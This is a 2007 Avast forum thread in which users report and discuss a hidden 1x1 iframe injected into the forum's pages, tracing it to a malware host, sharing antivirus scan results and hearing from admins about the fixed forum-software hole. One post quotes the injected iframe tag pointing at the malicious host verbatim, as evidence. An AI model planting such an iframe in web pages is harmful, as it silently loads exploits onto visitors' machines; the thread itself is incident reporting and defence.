Avast WEBforum
Other => General Topics => Topic started by: DavidR on August 24, 2007, 11:46:03 PM
-
I have been experiencing problem posting replies to topics in that the instead of the topic being displayed with the new pot added it hangs in mid post or that is what it appears to do. If I go back and refresh the topic I can see the post I added.
When this hang happens I saw a 1 pixel square at the top left of the screen and it would appear that there is another script running form mediacount, in the forum of an iFrame 1 pixel X 1 pixel. I had noticed this square in previous pages but didn't twig what it was.
<iframe src='http://mediacount.net/strong/020sdsfg' width=1 height=1></iframe>I don't know what the consequences of placing an iFrame outside of the body/head of a wc3 standard page would be.
This I believe is happening because I have noscript and firefox, and becake this is a new addition to avast pages, I have only allowed avast.com and google-analytics.com and not mediacount.net. It took ages to find this and trying to ad mediacount.net is proving to be difficult.
Is anyone else experiencing this problem or noticing the 1 pixel square at the top left of pages ?
So what is avast using mediacount.net for and why use an iFrame tag, which is notorious for introducing malware into systems as it can run scripts with user input ?
This use of an iFrame tag on what is a security based web site I feel is a big mistake.
Edit: Looks like this mention of the iframe and malware exploit proved to be very accurate (see images below).
-
This is what the screen looks like with the 1 pixel iFrame if experiencing this problem.
If the hang occurs the URL in the window is where it hangs.
Edit: The images I tried to attach failed because the malware iframe screwed with the attachments and they don't display so I have removed 1-pixel.gif and 1-pixel-hang.gif to avoid anyone trying to load them.
-
There also seems to be a further problem in that the attached images don't display either.
So since this mediacount.net iFrame it has screwed my forum use with the Babylon theme, making it almost impossible to use the forum not knowing if the post was successful. Not very useful when you post about 20 posts a day.
-
Test, with NoScript disabled.
Edit: absolutely no change with NoScript disabled. I have no idea what is going on since this iFrame for mediacount.net has been added but it totally screws me up.
-
Well I guess I found out a little more it would appear that the iFrame is a malware infestation on the forums, I wondered why it was lonely on the forums.
(http://img.photobucket.com/albums/v325/for-dwr/mediacount-net.gif)
This is the link the iFrame goes to and DrWeb link scanner reports Exploit.ANIFile
http[break]://[break] mediacount.net/strong/020sdsfg/324123.htm
(http://img.photobucket.com/albums/v325/for-dwr/mediacount-ani-exploit.gif)
-
Wow, its lonely on here, I have just looked at the recent posts and I'm the only one soldiering on with 10 out of the last 12 posts since 6 p.m. UK local time.
I have reported the forum as infected to virus @ avast . com lets hope it is resolved quickly.
-
Seems it's working now... testing...
Edited: the page does not come back to the same topic but to an empty page... strange. Look at the active tab in Firefox...
-
I can't quote...
The page does not come back to the original thread but to a blank page...
-
I noticed the 1x1 pixel square whenever I log in. I had mediacount.net disabled by No-Script but when I disable No-Script, I still see the square as well. :-\
Wilders are also talking about it here (http://www.wilderssecurity.com/showthread.php?s=f721035386a80fb891bb8a6fa38ea774&t=183634)
-
Well, I'm glad I read these posts. Have been unable to log on in Firefox, and when I attempt in IE7, Avast AV blocks the page from loading. Ironic.
Strange. Just noticed I am logged on. Just got a pixel before.
Also unable to modify profile.
-
I have no idea how this was able to come through. I removed that, upgraded to latest version, will investigate.
How would the person know I'm _far_ away from my computer? ::)
-
Firefox by all accounts isn't vulnerable to this attach by all accounts, even with noscript disabled, when I experienced page problem I checked the page source in trying to track the problem and saw the iframe tag. At first I just thought the forums was using it to gather page visited data, etc. and thought it a crazy method to do it.
However, when I tried using avant an IE clone web shield alerted. So I twigged the site had been infected, so I sent a report to avast.
These were the two images I tried to attach earlier that failed.
It would be interesting to know if this was purely a security failing of SMC 1.1.2 as I found several such issues on the Simple Machines forums and they were also using 1.1.2 but it seemed they also had a weakness in their webhosting service.
-
Here is what I got yesterday:
(http://img.photobucket.com/albums/v190/bob3160/ShellFTP/finjan-fp.png)
and most of today, I was greeted with the following:
(http://img.photobucket.com/albums/v190/bob3160/ShellFTP/ForumMaintenance.png)
Glad the forum is back but would like an explanation. :)
-
I have no idea how this was able to come through. I removed that, upgraded to latest version, will investigate.
How would the person know I'm _far_ away from my computer? ::)
Well I'm glad you're close to your computer..now. :)
-
How would the person know I'm _far_ away from my computer? ::)
Inside information? ;D
-
A forum member at Wilders suggested it would be a good idea for the Avast forum admin to send a mass email to all the forum users briefly explaining what happened, and offering the appropriate reassurance. (Or not ;))
I agree with that thinking.http://www.wilderssecurity.com/showthread.php?t=183634&page=3 (http://www.wilderssecurity.com/showthread.php?t=183634&page=3)
-
An explanation in this Forum or on the Alwil website should be sufficient. :)
-
A forum member at Wilders suggested it would be a good idea for the Avast forum admin to send a mass email to all the forum users briefly explaining what happened, and offering the appropriate reassurance. (Or not ;))
I agree with that thinking.
I think like Bob. I'd rather an explanation (what was compromised by the exploit: our emails, our personal forum data, the posts themselves...) than a spam hysteria.
-
Glad things are up and running again. And rather quickly, I think.
I'll also cast a vote in favor of an explanation - not so much of what happened. That's rather obvious. But the ramifications, the lasting effects ...
-
I never did get any malware warning, but I did get weird behavior here last night and this morning that, given the (coincidental?) timing, could very well have been tied into the same thing.
If I attempted to mark a forum as read, or in some cases simply returned to a forum after reading a topic, I got an error message to the effect that session verification had failed, try logging out and back in again. But hitting the log-out button simply gave me the same error and left me logged in.
Whatever happened, it's nice to see everything's back up and running normally again.
-
I'm still experiencing deep lags using avast + Firefox + Comodo.
The lag does not occurs so deeply if I browse with Opera.
The lag disappears if I browso with Opera and WebShield disabled.
It's becoming a mystery...
-
I'm OK so far with Avant (an IE shell).
Yesterday I couldn't log in in Avant, Opera, or Firefox. I kept getting an incorrect password error. Couldn't create a new account either.
-
I'm still experiencing deep lags using avast + Firefox + Comodo.
The lag does not occurs so deeply if I browse with Opera.
The lag disappears if I browso with Opera and WebShield disabled.
It's becoming a mystery...
Odd ... if by Comodo you mean the firewall, I'm having no problems at all with the same combination (on dialup).
Maybe while you were sleeping, Brazil got moved to another planet so you now have a teensy bit of transmission lag? ;)
-
An explanation in this Forum or on the Alwil website should be sufficient. :)
Ok, agree with that, too. Don't mind which form it takes. p'raps a forum announcement would be preferable.
-
Firefox users may have ben exposed to malware not detected by avast. I picked this up in my Firefox cache:
(The malware was still infecting the Google cache of the forum as of yesterday evening.)
Antivirus Version Last Update Result
AhnLab-V3 2007.8.25.0 2007.08.24 -
AntiVir 7.4.1.63 2007.08.25 HTML/Shellcode.Gen
Authentium 4.93.8 2007.08.25 -
Avast 4.7.1029.0 2007.08.25 -
AVG 7.5.0.484 2007.08.25 -
BitDefender 7.2 2007.08.26 -
CAT-QuickHeal 9.00 2007.08.25 -
ClamAV 0.91 2007.08.26 -
DrWeb 4.33 2007.08.26 VBS.Psyme.443
eSafe 7.0.15.0 2007.08.23 -
eTrust-Vet 31.1.5085 2007.08.24 -
Ewido 4.0 2007.08.25 Downloader.Psyme.kt
FileAdvisor 1 2007.08.26 -
Fortinet 2.91.0.0 2007.08.26 VBS/Agent.U!tr.dldr
F-Prot 4.3.2.48 2007.08.25 -
F-Secure 6.70.13030.0 2007.08.24 -
Ikarus T3.1.1.12 2007.08.26 -
Kaspersky 4.0.2.24 2007.08.26 -
McAfee 5105 2007.08.24 -
Microsoft 1.2803 2007.08.26 -
NOD32v2 2484 2007.08.25 -
Norman 5.80.02 2007.08.24 -
Panda 9.0.0.4 2007.08.25 -
Prevx1 V2 2007.08.26 -
Rising 19.37.61.00 2007.08.26 -
Sophos 4.21.0 2007.08.25 Mal/JSShell-C
Sunbelt 2.2.907.0 2007.08.25 -
Symantec 10 2007.08.26 -
TheHacker 6.1.8.173 2007.08.26 -
VBA32 3.12.2.3 2007.08.26 -
VirusBuster 4.3.26:9 2007.08.25 -
Webwasher-Gateway 6.0.1 2007.08.26 Script.Shellcode.Gen
Seems to be an exploit so users of up-to-date Firefox were not at risk.
Still, a scan with Ewido/CureIT! might be in order.
EDIT: The write-up for this malware only states: 'Exploits system or software vulnerabilities', so I'm not sure if it was specifically aimed at Firefox. If it's a VBS as DrWeb and Fortinet suggest, it might also have been aimed at IE. Don't know why I found this one and not the ANI exploit.
http://www.sophos.com/security/analyses/maljsshellc.html
-
My goodness! Seems I missed all the fun here lately!.
Glad that things are working ok now though and good job getting rid of the culprit.
-
Hello malware fighters,
Do not give it to much attention. That is always the best policy. If no one was actually compromised. Again strange because this Iframe hacking in combination with a Storm worm variant happened to various other forums in 2004. It also happened to the site of The Register in the U.K. as I remember. So a security company should be aware of these things threatening their very forums.
On the other hand we could say that the very in browser security is far from ideal. If only script could be sandboxed really secure and this was brought in by default inside all kind of browsers, script kiddies and malware authors would not welcome that day. Hell no, they would have a troublesome time when NoScript was on in browsers for instance to launch their malicious attacks. But others would not welcome this very much because it would hamper their silent profiling, tracking and monitoring for what ever reason you could imagine. This is in a few words the actual crux of the big divide between easy and commercially interesting and secure and consumer friendly. So all solutions taken are still far from definitive, and the user has to bring in his own forms of protection, as you think of it really a shame.
polonus
-
I had the same problem on friday I got a web shield warning and IE7 came up with a request for a remote connection Active-x to run. To which I obviously said get lost . I did a full check afterwards and was clean so my security and webshield worked
-
Firefox users may have ben exposed to malware not detected by avast. I picked this up in my Firefox cache:
<snip>
Seems to be an exploit so users of up-to-date Firefox were not at risk.
Still, a scan with Ewido/CureIT! might be in order.
<snip>
I found that in my firefox cache too, when I ran avg-as scan afterwards. I have to admit I didn't check the creation date and time. I also did a VT scan and send the sample to avast.
Now perhaps people will realise how powerful iframe tags can be when so many are used in emails. Hence the avast suspect alerts when found in emails.
-
So a security company should be aware of these things threatening their very forums.
Hmmm... what happened then? Do they sleep?
-
Do not give it to much attention. That is always the best policy.
Sticking your head in the sand and making believe nothing happened is never a good policy. IMHO
-
No one's sticking anything anywhere. Please see the other thread.
Cheers
Vlk
-
Guys,
I'm also still waiting for a detailed explanation of what actually took place. All I know is that the scum took advantange of a vulnerability in SMF 1.1.12 (that was installed on the server). Kubecj (our web admin) is out of the country but we were able to have him fix the issue yesterday late night. He should be coming home tonight so I hope I (and you, too) will get a satisfactory explanation soon.
Thanks
Vlk
Thanks Vlk :)
-
bob3160...
Have a blessed Sunday...it is Sunday afterall. ;)
Peace
-
bob3160...
Have a blessed Sunday...it is Sunday afterall. ;)
Peace
Thanks you to. :)
-
Hi bob3160,
I did not mean that there should not be an analysis of the facts to better prevent this for the future, of course that is appropriate. I just meant to stay do not make it bigger than it is, because the people that do these things do this just because of that reason. That was all that I meant to say in my previous posting.
polonus
-
I would concur Pol I mean webshield stopped it